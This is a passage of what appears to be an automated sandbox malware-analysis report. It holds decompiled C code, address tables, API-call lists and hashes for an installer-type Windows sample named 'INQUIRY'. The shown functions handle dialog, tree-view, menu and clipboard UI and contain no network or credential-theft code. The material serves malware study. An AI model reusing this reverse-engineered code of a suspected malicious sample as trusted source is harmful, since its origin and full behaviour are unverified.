                          								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                          							}
                          							E00403E10(1);
                          							goto L25;
                          						}
                          						 *0x41f860 = 2;
                          						E00403E10(0x78);
                          						goto L20;
                          					} else {
                          						__eflags = _a12 - 0x403;
                          						if(_a12 != 0x403) {
                          							L20:
                          							return E00403E9E(_a8, _a12, _a16);
                          						}
                          						ShowWindow( *0x423670, _t149);
                          						ShowWindow(_t154, 8);
                          						E00403E6C(_t154);
                          						goto L17;
                          					}
                          				}
                          				_v52 = _v52 | 0xffffffff;
                          				_v40 = _v40 | 0xffffffff;
                          				_v60 = 2;
                          				_v56 = 0;
                          				_v48 = 0;
                          				_v44 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				_t123 =  *0x423eb0; // 0x51d818
                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                          				 *0x423670 = GetDlgItem(_a4, 0x403);
                          				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                          				_t127 = GetDlgItem(_a4, 0x3f8);
                          				 *0x423684 = _t127;
                          				_v8 = _t127;
                          				E00403E6C( *0x423670);
                          				 *0x423674 = E004046C5(4);
                          				 *0x42368c = 0;
                          				GetClientRect(_v8,  &_v28);
                          				_v52 = _v28.right - GetSystemMetrics(0x15);
                          				SendMessageA(_v8, 0x101b, 0,  &_v60);
                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                          				if(_a8 >= 0) {
                          					SendMessageA(_v8, 0x1001, 0, _a8);
                          					SendMessageA(_v8, 0x1026, 0, _a8);
                          				}
                          				if(_a12 >= _t149) {
                          					SendMessageA(_v8, 0x1024, _t149, _a12);
                          				}
                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                          				_push(0x1b);
                          				E00403E37(_a4);
                          				if(( *0x423eb8 & 0x00000003) != 0) {
                          					ShowWindow( *0x423670, _t149);
                          					if(( *0x423eb8 & 0x00000002) != 0) {
                          						 *0x423670 = _t149;
                          					} else {
                          						ShowWindow(_v8, 8);
                          					}
                          					E00403E6C( *0x423668);
                          				}
                          				_t158 = GetDlgItem(_a4, 0x3ec);
                          				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                          				if(( *0x423eb8 & 0x00000004) != 0) {
                          					SendMessageA(_t158, 0x409, _t149, _a12);
                          					SendMessageA(_t158, 0x2001, _t149, _a8);
                          				}
                          				goto L37;
                          			}



































                          0x00404f6a
                          0x00404f70
                          0x00404f79
                          0x00404f7c
                          0x0040510d
                          0x00405114
                          0x00405138
                          0x00405138
                          0x0040513e
                          0x0040514b
                          0x00405169
                          0x00405169
                          0x00405170
                          0x004051c7
                          0x004051c7
                          0x004051cb
                          0x00000000
                          0x00000000
                          0x004051cd
                          0x004051d0
                          0x00000000
                          0x00000000
                          0x004051da
                          0x004051e0
                          0x004051e2
                          0x004051e5
                          0x004052de
                          0x00000000
                          0x004052de
                          0x004051f4
                          0x00405200
                          0x00405206
                          0x00405209
                          0x0040520c
                          0x00405221
                          0x00405224
                          0x00405224
                          0x00405227
                          0x0040520e
                          0x00405213
                          0x00405219
                          0x0040521c
                          0x0040521c
                          0x00405237
                          0x0040523f
                          0x00405240
                          0x00405242
                          0x0040524b
                          0x0040524e
                          0x00405255
                          0x0040525c
                          0x00405264
                          0x00405264
                          0x00405272
                          0x00405278
                          0x0040527b
                          0x0040527b
                          0x00405282
                          0x00405288
                          0x00405291
                          0x00405298
                          0x004052a1
                          0x004052a3
                          0x004052a6
                          0x004052b5
                          0x004052b7
                          0x004052bd
                          0x004052be
                          0x004052bf
                          0x004052bf
                          0x004052c7
                          0x004052d2
                          0x004052d8
                          0x004052d8
                          0x00000000
                          0x00405242
                          0x00405172
                          0x00405178
                          0x004051a8
                          0x004051aa
                          0x004051b0
                          0x004051b2
                          0x004051bb
                          0x004051bb
                          0x004051c2
                          0x00000000
                          0x004051c2
                          0x0040517c
                          0x00405186
                          0x00000000
                          0x0040514d
                          0x0040514d
                          0x00405153
                          0x0040518b
                          0x00000000
                          0x00405194
                          0x0040515c
                          0x00405161
                          0x00405164
                          0x00000000
                          0x00405164
                          0x0040514b
                          0x00404f82
                          0x00404f86
                          0x00404f8f
                          0x00404f96
                          0x00404f99
                          0x00404f9c
                          0x00404f9f
                          0x00404fa0
                          0x00404fa1
                          0x00404fba
                          0x00404fbd
                          0x00404fc7
                          0x00404fd6
                          0x00404fde
                          0x00404fe6
                          0x00404feb
                          0x00404fee
                          0x00404ffa
                          0x00405003
                          0x0040500c
                          0x0040502f
                          0x00405035
                          0x00405046
                          0x0040504b
                          0x00405059
                          0x00405067
                          0x00405067
                          0x0040506c
                          0x0040507a
                          0x0040507a
                          0x0040507f
                          0x00405082
                          0x00405087
                          0x00405093
                          0x0040509c
                          0x004050a9
                          0x004050b8
                          0x004050ab
                          0x004050b0
                          0x004050b0
                          0x004050c4
                          0x004050c4
                          0x004050d8
                          0x004050e1
                          0x004050ea
                          0x004050fa
                          0x00405106
                          0x00405106
                          0x00000000

                          APIs
                          • GetDlgItem.USER32 ref: 00404FC0
                          • GetDlgItem.USER32 ref: 00404FCF
                          • GetClientRect.USER32 ref: 0040500C
                          • GetSystemMetrics.USER32 ref: 00405014
                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                          • ShowWindow.USER32(?,00000008), ref: 004050B0
                          • GetDlgItem.USER32 ref: 004050D1
                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                          • GetDlgItem.USER32 ref: 00404FDE
                            • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                          • GetDlgItem.USER32 ref: 00405123
                          • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                          • CloseHandle.KERNEL32(00000000), ref: 00405138
                          • ShowWindow.USER32(00000000), ref: 0040515C
                          • ShowWindow.USER32(00000000,00000008), ref: 00405161
                          • ShowWindow.USER32(00000008), ref: 004051A8
                          • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
                          • CreatePopupMenu.USER32 ref: 004051EB
                          • AppendMenuA.USER32 ref: 00405200
                          • GetWindowRect.USER32 ref: 00405213
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                          • OpenClipboard.USER32(00000000), ref: 00405282
                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                          • GlobalLock.KERNEL32 ref: 0040529B
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                          • SetClipboardData.USER32(00000001,00000000), ref: 004052D2
                          • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                          • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                          				struct HWND__* _v8;
                          				struct HWND__* _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				void* _v24;
                          				long _v28;
                          				int _v32;
                          				signed int _v40;
                          				int _v44;
                          				signed int* _v56;
                          				intOrPtr _v60;
                          				signed int _v64;
                          				long _v68;
                          				void* _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				void* _v84;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				struct HWND__* _t182;
                          				intOrPtr _t183;
                          				int _t189;
                          				int _t196;
                          				intOrPtr _t198;
                          				long _t202;
                          				signed int _t206;
                          				signed int _t217;
                          				void* _t220;
                          				void* _t221;
                          				int _t227;
                          				intOrPtr _t231;
                          				signed int _t232;
                          				signed int _t233;
                          				signed int _t240;
                          				signed int _t242;
                          				signed int _t245;
                          				signed int _t247;
                          				struct HBITMAP__* _t250;
                          				void* _t252;
                          				char* _t268;
                          				signed char _t269;
                          				long _t274;
                          				int _t280;
                          				signed int* _t281;
                          				int _t282;
                          				long _t283;
                          				signed int* _t284;
                          				int _t285;
                          				long _t286;
                          				signed int _t287;
                          				long _t288;
                          				signed int _t291;
                          				int _t294;
                          				signed int _t298;
                          				signed int _t300;
                          				signed int _t302;
                          				intOrPtr _t309;
                          				int* _t310;
                          				void* _t311;
                          				int _t315;
                          				int _t316;
                          				int _t317;
                          				signed int _t318;
                          				void* _t320;
                          				void* _t328;
                          				void* _t331;
                          
                          				_v12 = GetDlgItem(_a4, 0x3f9);
                          				_t182 = GetDlgItem(_a4, 0x408);
                          				_t280 =  *0x423ec8; // 0x51d9c4
                          				_t320 = SendMessageA;
                          				_v8 = _t182;
                          				_t183 =  *0x423eb0; // 0x51d818
                          				_t315 = 0;
                          				_v32 = _t280;
                          				_v20 = _t183 + 0x94;
                          				if(_a8 != 0x110) {
                          					L23:
                          					__eflags = _a8 - 0x405;
                          					if(_a8 != 0x405) {
                          						_t289 = _a16;
                          					} else {
                          						_a12 = _t315;
                          						_t289 = 1;
                          						_a8 = 0x40f;
                          						_a16 = 1;
                          					}
                          					__eflags = _a8 - 0x4e;
                          					if(_a8 == 0x4e) {
                          						L28:
                          						__eflags = _a8 - 0x413;
                          						_v16 = _t289;
                          						if(_a8 == 0x413) {
                          							L30:
                          							__eflags =  *0x423eb9 & 0x00000002;
                          							if(( *0x423eb9 & 0x00000002) != 0) {
                          								L41:
                          								__eflags = _v16 - _t315;
                          								if(_v16 != _t315) {
                          									_t232 = _v16;
                          									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                          									}
                          									_t233 = _v16;
                          									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                          										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                          											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                          											 *_t284 =  *_t284 & 0xffffffdf;
                          											__eflags =  *_t284;
                          										} else {
                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                          										}
                          									}
                          								}
                          								goto L48;
                          							}
                          							__eflags = _a8 - 0x413;
                          							if(_a8 == 0x413) {
                          								L33:
                          								__eflags = _a8 - 0x413;
                          								_t289 = 0 | _a8 != 0x00000413;
                          								_t240 = E004046F2(_v8, _a8 != 0x413);
                          								__eflags = _t240 - _t315;
                          								if(_t240 >= _t315) {
                          									_t93 = _t280 + 8; // 0x8
                          									_t310 = _t240 * 0x418 + _t93;
                          									_t289 =  *_t310;
                          									__eflags = _t289 & 0x00000010;
                          									if((_t289 & 0x00000010) == 0) {
                          										__eflags = _t289 & 0x00000040;
                          										if((_t289 & 0x00000040) == 0) {
                          											_t298 = _t289 ^ 0x00000001;
                          											__eflags = _t298;
                          										} else {
                          											_t300 = _t289 ^ 0x00000080;
                          											__eflags = _t300;
                          											if(_t300 >= 0) {
                          												_t298 = _t300 & 0xfffffffe;
                          											} else {
                          												_t298 = _t300 | 0x00000001;
                          											}
                          										}
                          										 *_t310 = _t298;
                          										E0040117D(_t240);
                          										_t242 =  *0x423eb8; // 0x80
                          										_t289 = 1;
                          										_a8 = 0x40f;
                          										_t245 =  !_t242 >> 0x00000008 & 1;
                          										__eflags = _t245;
                          										_a12 = 1;
                          										_a16 = _t245;
                          									}
                          								}
                          								goto L41;
                          							}
                          							_t289 = _a16;
                          							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                          							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                          								goto L41;
                          							}
                          							goto L33;
                          						}
                          						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                          						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                          							goto L48;
                          						}
                          						goto L30;
                          					} else {
                          						__eflags = _a8 - 0x413;
                          						if(_a8 != 0x413) {
                          							L48:
                          							__eflags = _a8 - 0x111;
                          							if(_a8 != 0x111) {
                          								L56:
                          								__eflags = _a8 - 0x200;
                          								if(_a8 == 0x200) {
                          									SendMessageA(_v8, 0x200, _t315, _t315);
                          								}
                          								__eflags = _a8 - 0x40b;
                          								if(_a8 == 0x40b) {
                          									_t220 =  *0x420474;
                          									__eflags = _t220 - _t315;
                          									if(_t220 != _t315) {
                          										ImageList_Destroy(_t220);
                          									}
                          									_t221 =  *0x42048c;
                          									__eflags = _t221 - _t315;
                          									if(_t221 != _t315) {
                          										GlobalFree(_t221);
                          									}
                          									 *0x420474 = _t315;
                          									 *0x42048c = _t315;
                          									 *0x423f00 = _t315;
                          								}
                          								__eflags = _a8 - 0x40f;
                          								if(_a8 != 0x40f) {
                          									L86:
                          									__eflags = _a8 - 0x420;
                          									if(_a8 == 0x420) {
                          										__eflags =  *0x423eb9 & 0x00000001;
                          										if(( *0x423eb9 & 0x00000001) != 0) {
                          											__eflags = _a16 - 0x20;
                          											_t189 = (0 | _a16 == 0x00000020) << 3;
                          											__eflags = _t189;
                          											_t316 = _t189;
                          											ShowWindow(_v8, _t316);
                          											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                          										}
                          									}
                          									goto L89;
                          								} else {
                          									E004011EF(_t289, _t315, _t315);
                          									__eflags = _a12 - _t315;
                          									if(_a12 != _t315) {
                          										E0040140B(8);
                          									}
                          									__eflags = _a16 - _t315;
                          									if(_a16 == _t315) {
                          										L73:
                          										E004011EF(_t289, _t315, _t315);
                          										__eflags =  *0x423ecc - _t315; // 0x1
                          										_v32 =  *0x42048c;
                          										_t196 =  *0x423ec8; // 0x51d9c4
                          										_v60 = 0xf030;
                          										_v16 = _t315;
                          										if(__eflags <= 0) {
                          											L84:
                          											InvalidateRect(_v8, _t315, 1);
                          											_t198 =  *0x42367c; // 0x5233c1
                          											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                          											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                          												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                          											}
                          											goto L86;
                          										} else {
                          											_t142 = _t196 + 8; // 0x51d9cc
                          											_t281 = _t142;
                          											do {
                          												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                          												__eflags = _t202 - _t315;
                          												if(_t202 != _t315) {
                          													_t291 =  *_t281;
                          													_v68 = _t202;
                          													__eflags = _t291 & 0x00000001;
                          													_v72 = 8;
                          													if((_t291 & 0x00000001) != 0) {
                          														_t151 =  &(_t281[4]); // 0x51d9dc
                          														_v72 = 9;
                          														_v56 = _t151;
                          														_t154 =  &(_t281[0]);
                          														 *_t154 = _t281[0] & 0x000000fe;
                          														__eflags =  *_t154;
                          													}
                          													__eflags = _t291 & 0x00000040;
                          													if((_t291 & 0x00000040) == 0) {
                          														_t206 = (_t291 & 0x00000001) + 1;
                          														__eflags = _t291 & 0x00000010;
                          														if((_t291 & 0x00000010) != 0) {
                          															_t206 = _t206 + 3;
                          															__eflags = _t206;
                          														}
                          													} else {
                          														_t206 = 3;
                          													}
                          													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                          													__eflags = _t294;
                          													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                          													SendMessageA(_v8, 0x1102, _t294, _v68);
                          													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                          												}
                          												_v16 = _v16 + 1;
                          												_t281 =  &(_t281[0x106]);
                          												__eflags = _v16 -  *0x423ecc; // 0x1
                          											} while (__eflags < 0);
                          											goto L84;
                          										}
                          									} else {
                          										_t282 = E004012E2( *0x42048c);
                          										E00401299(_t282);
                          										_t217 = 0;
                          										_t289 = 0;
                          										__eflags = _t282 - _t315;
                          										if(_t282 <= _t315) {
                          											L72:
                          											SendMessageA(_v12, 0x14e, _t289, _t315);
                          											_a16 = _t282;
                          											_a8 = 0x420;
                          											goto L73;
                          										} else {
                          											goto L69;
                          										}
                          										do {
                          											L69:
                          											_t309 = _v20;
                          											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                          											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                          												_t289 = _t289 + 1;
                          												__eflags = _t289;
                          											}
                          											_t217 = _t217 + 1;
                          											__eflags = _t217 - _t282;
                          										} while (_t217 < _t282);
                          										goto L72;
                          									}
                          								}
                          							}
                          							__eflags = _a12 - 0x3f9;
                          							if(_a12 != 0x3f9) {
                          								goto L89;
                          							}
                          							__eflags = _a12 >> 0x10 - 1;
                          							if(_a12 >> 0x10 != 1) {
                          								goto L89;
                          							}
                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                          							__eflags = _t227 - 0xffffffff;
                          							if(_t227 == 0xffffffff) {
                          								goto L89;
                          							}
                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                          							__eflags = _t283 - 0xffffffff;
                          							if(_t283 == 0xffffffff) {
                          								L54:
                          								_t283 = 0x20;
                          								L55:
                          								E00401299(_t283);
                          								SendMessageA(_a4, 0x420, _t315, _t283);
                          								_a12 = 1;
                          								_a16 = _t315;
                          								_a8 = 0x40f;
                          								goto L56;
                          							}
                          							_t231 = _v20;
                          							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                          							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                          								goto L55;
                          							}
                          							goto L54;
                          						}
                          						goto L28;
                          					}
                          				} else {
                          					 *0x423f00 = _a4;
                          					_t247 =  *0x423ecc; // 0x1
                          					_t285 = 2;
                          					_v28 = 0;
                          					_v16 = _t285;
                          					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
                          					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                          					 *0x420480 =  *0x420480 | 0xffffffff;
                          					_v24 = _t250;
                          					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                          					 *0x420474 = _t252;
                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                          					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                          					}
                          					DeleteObject(_v24);
                          					_t286 = 0;
                          					do {
                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                          						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                          							if(_t286 != 0x20) {
                          								_v16 = _t315;
                          							}
                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                          						}
                          						_t286 = _t286 + 1;
                          					} while (_t286 < 0x21);
                          					_t317 = _a16;
                          					_t287 = _v16;
                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                          					_push(0x15);
                          					E00403E37(_a4);
                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                          					_push(0x16);
                          					E00403E37(_a4);
                          					_t318 = 0;
                          					_t288 = 0;
                          					_t328 =  *0x423ecc - _t318; // 0x1
                          					if(_t328 <= 0) {
                          						L19:
                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                          						goto L20;
                          					} else {
                          						_t311 = _v32 + 8;
                          						_v24 = _t311;
                          						do {
                          							_t268 = _t311 + 0x10;
                          							if( *_t268 != 0) {
                          								_v60 = _t268;
                          								_t269 =  *_t311;
                          								_t302 = 0x20;
                          								_v84 = _t288;
                          								_v80 = 0xffff0002;
                          								_v76 = 0xd;
                          								_v64 = _t302;
                          								_v40 = _t318;
                          								_v68 = _t269 & _t302;
                          								if((_t269 & 0x00000002) == 0) {
                          									__eflags = _t269 & 0x00000004;
                          									if((_t269 & 0x00000004) == 0) {
                          										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                          									} else {
                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                          									}
                          								} else {
                          									_v76 = 0x4d;
                          									_v44 = 1;
                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                          									_v28 = 1;
                          									 *( *0x42048c + _t318 * 4) = _t274;
                          									_t288 =  *( *0x42048c + _t318 * 4);
                          								}
                          							}
                          							_t318 = _t318 + 1;
                          							_t311 = _v24 + 0x418;
                          							_t331 = _t318 -  *0x423ecc; // 0x1
                          							_v24 = _t311;
                          						} while (_t331 < 0);
                          						if(_v28 != 0) {
                          							L20:
                          							if(_v16 != 0) {
                          								E00403E6C(_v8);
                          								_t280 = _v32;
                          								_t315 = 0;
                          								__eflags = 0;
                          								goto L23;
                          							} else {
                          								ShowWindow(_v12, 5);
                          								E00403E6C(_v12);
                          								L89:
                          								return E00403E9E(_a8, _a12, _a16);
                          							}
                          						}
                          						goto L19;
                          					}
                          				}
                          			}






































































                          0x00404790
                          0x00404796
                          0x00404798
                          0x0040479e
                          0x004047a4
                          0x004047a7
                          0x004047b1
                          0x004047ba
                          0x004047bd
                          0x004047c0
                          0x004049e8
                          0x004049e8
                          0x004049ef
                          0x00404a03
                          0x004049f1
                          0x004049f3
                          0x004049f6
                          0x004049f7
                          0x004049fe
                          0x004049fe
                          0x00404a06
                          0x00404a0f
                          0x00404a1a
                          0x00404a1a
                          0x00404a1d
                          0x00404a20
                          0x00404a2f
                          0x00404a2f
                          0x00404a36
                          0x00404aae
                          0x00404aae
                          0x00404ab1
                          0x00404ab3
                          0x00404ab6
                          0x00404abd
                          0x00404acb
                          0x00404acb
                          0x00404acd
                          0x00404ad0
                          0x00404ad7
                          0x00404ad9
                          0x00404add
                          0x00404afa
                          0x00404afe
                          0x00404afe
                          0x00404adf
                          0x00404aec
                          0x00404aec
                          0x00404add
                          0x00404ad7
                          0x00000000
                          0x00404ab1
                          0x00404a38
                          0x00404a3b
                          0x00404a46
                          0x00404a48
                          0x00404a4b
                          0x00404a52
                          0x00404a57
                          0x00404a59
                          0x00404a63
                          0x00404a63
                          0x00404a67
                          0x00404a69
                          0x00404a6c
                          0x00404a6e
                          0x00404a71
                          0x00404a87
                          0x00404a87
                          0x00404a73
                          0x00404a73
                          0x00404a79
                          0x00404a7b
                          0x00404a82
                          0x00404a7d
                          0x00404a7d
                          0x00404a7d
                          0x00404a7b
                          0x00404a8b
                          0x00404a8d
                          0x00404a92
                          0x00404a9b
                          0x00404a9c
                          0x00404aa6
                          0x00404aa6
                          0x00404aa8
                          0x00404aab
                          0x00404aab
                          0x00404a6c
                          0x00000000
                          0x00404a59
                          0x00404a3d
                          0x00404a40
                          0x00404a44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404a44
                          0x00404a22
                          0x00404a29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404a11
                          0x00404a11
                          0x00404a14
                          0x00404b01
                          0x00404b01
                          0x00404b08
                          0x00404b7c
                          0x00404b7c
                          0x00404b83
                          0x00404b8f
                          0x00404b8f
                          0x00404b91
                          0x00404b98
                          0x00404b9a
                          0x00404b9f
                          0x00404ba1
                          0x00404ba4
                          0x00404ba4
                          0x00404baa
                          0x00404baf
                          0x00404bb1
                          0x00404bb4
                          0x00404bb4
                          0x00404bba
                          0x00404bc0
                          0x00404bc6
                          0x00404bc6
                          0x00404bcc
                          0x00404bd3
                          0x00404d20
                          0x00404d20
                          0x00404d27
                          0x00404d29
                          0x00404d30
                          0x00404d34
                          0x00404d41
                          0x00404d41
                          0x00404d44
                          0x00404d4a
                          0x00404d5c
                          0x00404d5c
                          0x00404d30
                          0x00000000
                          0x00404bd9
                          0x00404bdb
                          0x00404be0
                          0x00404be3
                          0x00404be7
                          0x00404be7
                          0x00404bec
                          0x00404bef
                          0x00404c30
                          0x00404c32
                          0x00404c3c
                          0x00404c42
                          0x00404c45
                          0x00404c4a
                          0x00404c51
                          0x00404c54
                          0x00404cf6
                          0x00404cfc
                          0x00404d02
                          0x00404d07
                          0x00404d0a
                          0x00404d1b
                          0x00404d1b
                          0x00000000
                          0x00404c5a
                          0x00404c5a
                          0x00404c5a
                          0x00404c5d
                          0x00404c63
                          0x00404c66
                          0x00404c68
                          0x00404c6a
                          0x00404c6c
                          0x00404c6f
                          0x00404c72
                          0x00404c79
                          0x00404c7b
                          0x00404c7e
                          0x00404c85
                          0x00404c88
                          0x00404c88
                          0x00404c88
                          0x00404c88
                          0x00404c8c
                          0x00404c8f
                          0x00404c9b
                          0x00404c9c
                          0x00404c9f
                          0x00404ca1
                          0x00404ca1
                          0x00404ca1
                          0x00404c91
                          0x00404c93
                          0x00404c93
                          0x00404cc0
                          0x00404cc0
                          0x00404cc1
                          0x00404ccd
                          0x00404cdc
                          0x00404cdc
                          0x00404cde
                          0x00404ce1
                          0x00404cea
                          0x00404cea
                          0x00000000
                          0x00404c5d
                          0x00404bf1
                          0x00404bfc
                          0x00404bff
                          0x00404c04
                          0x00404c06
                          0x00404c08
                          0x00404c0a
                          0x00404c1a
                          0x00404c24
                          0x00404c26
                          0x00404c29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404c0c
                          0x00404c0c
                          0x00404c0c
                          0x00404c0f
                          0x00404c12
                          0x00404c14
                          0x00404c14
                          0x00404c14
                          0x00404c15
                          0x00404c16
                          0x00404c16
                          0x00000000
                          0x00404c0c
                          0x00404bef
                          0x00404bd3
                          0x00404b0a
                          0x00404b10
                          0x00000000
                          0x00000000
                          0x00404b1c
                          0x00404b20
                          0x00000000
                          0x00000000
                          0x00404b30
                          0x00404b32
                          0x00404b35
                          0x00000000
                          0x00000000
                          0x00404b47
                          0x00404b49
                          0x00404b4c
                          0x00404b56
                          0x00404b58
                          0x00404b59
                          0x00404b5a
                          0x00404b69
                          0x00404b6b
                          0x00404b72
                          0x00404b75
                          0x00000000
                          0x00404b75
                          0x00404b4e
                          0x00404b51
                          0x00404b54
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404b54
                          0x00000000
                          0x00404a14
                          0x004047c6
                          0x004047cb
                          0x004047d0
                          0x004047d5
                          0x004047d6
                          0x004047df
                          0x004047ea
                          0x004047f5
                          0x004047fb
                          0x00404809
                          0x0040481e
                          0x00404823
                          0x0040482e
                          0x00404837
                          0x0040484c
                          0x0040485d
                          0x0040486a
                          0x0040486a
                          0x0040486f
                          0x00404875
                          0x00404877
                          0x0040487a
                          0x0040487f
                          0x00404884
                          0x00404886
                          0x00404886
                          0x004048a6
                          0x004048a6
                          0x004048a8
                          0x004048a9
                          0x004048ae
                          0x004048b1
                          0x004048b4
                          0x004048b8
                          0x004048bd
                          0x004048c2
                          0x004048c6
                          0x004048cb
                          0x004048d0
                          0x004048d2
                          0x004048d4
                          0x004048da
                          0x004049a4
                          0x004049b7
                          0x00000000
                          0x004048e0
                          0x004048e3
                          0x004048e6
                          0x004048e9
                          0x004048e9
                          0x004048ef
                          0x004048f5
                          0x004048f8
                          0x004048fe
                          0x004048ff
                          0x00404904
                          0x0040490d
                          0x00404914
                          0x00404917
                          0x0040491a
                          0x0040491d
                          0x00404957
                          0x00404959
                          0x00404982
                          0x0040495b
                          0x00404968
                          0x00404968
                          0x0040491f
                          0x00404922
                          0x00404931
                          0x0040493b
                          0x00404943
                          0x0040494a
                          0x00404952
                          0x00404952
                          0x0040491d
